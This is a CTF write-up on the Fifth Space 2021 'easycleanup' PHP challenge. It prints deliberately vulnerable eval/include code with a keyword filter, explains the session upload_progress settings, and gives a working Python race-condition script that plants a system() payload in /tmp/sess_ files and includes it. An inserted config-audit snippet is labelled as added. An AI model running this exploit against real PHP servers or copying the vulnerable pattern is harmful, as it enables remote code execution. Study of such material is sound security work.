Understand PHP from [Fifth space 2021] easycleanup_ session
2022-07-19 01:25:00 【Aiwin-Lau】
On to the challenge. Source code:
```php
<?php
if(!isset($_GET['mode'])){
    highlight_file(__file__);
}else if($_GET['mode'] == "eval"){
    $shell = isset($_GET['shell']) ? $_GET['shell'] : 'phpinfo();';
    if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker");
    eval($shell);
}

if(isset($_GET['file'])){
    if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker");
    include $_GET['file'];
}

function filter($var){
    $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"];
    foreach($banned as $ban){
        if(strstr($var, $ban)) return True;
    }
    return False;
}

function checkNums($var){
    $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $cnt = 0;
    for($i = 0; $i < strlen($alphanum); $i++){
        for($j = 0; $j < strlen($var); $j++){
            if($var[$j] == $alphanum[$i]){
                $cnt += 1;
                if($cnt > 8) return True;
            }
        }
    }
    return False;
}
?>
```

In the source, the shell parameter is passed to eval() and the file parameter is passed to include, but both are restricted: the banned-word filter applies to each, shell is additionally limited to 15 characters and to at most 8 characters from a-z0-9A-Z, and any violation hits exit(). Getting RCE through shell under these filters looks hopeless, so first look at the output of phpinfo() (which is what shell defaults to when mode=eval).

The relevant settings are (local value / master value):

1. session.save_handler: files / files
2. session.save_path: /tmp / /tmp
3. session.serialize_handler: php / php
4. session.upload_progress.cleanup: On / On
5. session.upload_progress.enabled: On / On
6. session.upload_progress.freq: 1% / 1%
7. session.upload_progress.min_freq: 1 / 1
8. session.upload_progress.name: PHP_SESSION_UPLOAD_PROGRESS / PHP_SESSION_UPLOAD_PROGRESS
9. session.upload_progress.prefix: upload_progress_ / upload_progress_
10. session.use_cookies: On / On
11. session.use_only_cookies: On / On
12. session.use_strict_mode: Off / Off

Line 1 means sessions are stored as files.
Line 2 says the session storage directory is /tmp.
Line 3 says the serialization/deserialization handler is php.
Line 5 says the upload_progress feature is enabled: when the browser uploads a file to the server, PHP stores the details of that upload in the session.
Line 4 says that once the upload finishes, PHP immediately clears the corresponding record from the session file.
Lines 6 and 7, freq and min_freq, set how often the progress information is updated on the server; setting them sensibly reduces server load.
Lines 8 and 9, prefix and name, set the variable name / key under which the progress information is stored in the session.
Line 10 means the session id is carried in a cookie.
Line 11 means only cookies are used to carry the session id on the client side.
Line 12 being Off means the session id in the cookie is not validated against existing sessions, so a client-supplied session id is accepted.
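The combination of settings the post relies on can be checked mechanically. The following is an added example, not code from the original post: it parses php.ini-style text (a constructed sample mirroring the phpinfo() values above) and reports whether upload_progress plus a non-strict session id make the session file under save_path writable by a client, then shows the same config with the two directives changed.

```python
# Added example (not from the original post): audit the session directives
# discussed above for the combination that makes /tmp/sess_<id> partly client-writable.
from typing import Dict, List, Tuple

# Constructed php.ini-style text mirroring the phpinfo() values in the post.
WEAK_INI = """
session.save_handler = files
session.save_path = "/tmp"
session.upload_progress.enabled = On
session.upload_progress.cleanup = On
session.use_strict_mode = Off   ; client may choose its own PHPSESSID
"""

# Same settings with the two directives that close the write primitive changed.
HARDENED_INI = (WEAK_INI.replace("upload_progress.enabled = On", "upload_progress.enabled = Off")
                        .replace("use_strict_mode = Off", "use_strict_mode = On"))


def parse_ini(text: str) -> Dict[str, str]:
    """Minimal php.ini parser: key = value, ';' comments, optional quotes."""
    cfg: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" not in line:
            continue
        key, value = (p.strip() for p in line.split("=", 1))
        cfg[key.lower()] = value.strip("\"'")
    return cfg


def is_on(cfg: Dict[str, str], key: str, default: str) -> bool:
    # Defaults follow PHP's own: upload_progress.enabled=On, cleanup=On, use_strict_mode=Off.
    return cfg.get(key, default).lower() in ("1", "on", "true", "yes")


def audit_session(ini_text: str) -> Tuple[str, List[str]]:
    """Return (risk, findings) for the upload_progress session-file write scenario."""
    cfg = parse_ini(ini_text)
    findings: List[str] = []
    progress = is_on(cfg, "session.upload_progress.enabled", "On")
    strict = is_on(cfg, "session.use_strict_mode", "Off")
    cleanup = is_on(cfg, "session.upload_progress.cleanup", "On")
    if progress:
        findings.append("upload_progress enabled: multipart field names are serialised into the session file")
    if not strict:
        findings.append("use_strict_mode off: an unknown PHPSESSID from the cookie is accepted as-is")
    if progress and not cleanup:
        findings.append("cleanup off: the progress record stays in the session file after the upload")
    if cfg.get("session.save_handler", "files") == "files":
        findings.append("files handler: session data is at %s/sess_<id>" % cfg.get("session.save_path", "/tmp"))
    # Both conditions together give a file with a known path and partly client-chosen content.
    risk = "high" if progress and not strict else ("medium" if progress or not strict else "low")
    return risk, findings
```

With a files handler the last finding is informational; the risk level is driven by the enabled/strict_mode pair.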
Approach:
When we set our own PHPSESSID in the cookie, PHP creates a session file for it on the server at /tmp/sess_<id>. The server initialises the session automatically, with a key of the form prefix + session.upload_progress.name. Because line 12 is Off, we can choose the cookie value and so the name of the session file, and through upload_progress we control part of its contents, which can then be reached by the file parameter's include. Because cleanup is On, this needs a race condition: the temporary /tmp/sess_<id> file has to be included before PHP clears it.
That is, send the following content.
Script:
```python
import requests
import threading

myurl = 'http://1.14.71.254:28736/index.php'
sessid = '1a1'
# The field name is serialised into the upload_progress record of /tmp/sess_<sessid>
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat /nssctfasdasdflag');?>"}
mycookie = {'PHPSESSID': sessid}


def send_file(session):
    # Keep re-creating the progress record so the include can hit it before cleanup removes it
    while True:
        resp = requests.post(url=myurl, data=writedata, files={'file': ('1.txt', b'123')}, cookies=mycookie)


def getflag(session):
    while True:
        payload_url = myurl + '?file=' + '/tmp/sess_' + sessid
        resp = requests.get(url=payload_url)
        if 'upload_progress' in resp.text:
            print(resp.text)
            break


if __name__ == '__main__':
    session = requests.session()
    # daemon thread so the script exits once getflag() returns
    t = threading.Thread(target=send_file, args=(session,), daemon=True)
    t.start()
    getflag(session)
```
Result: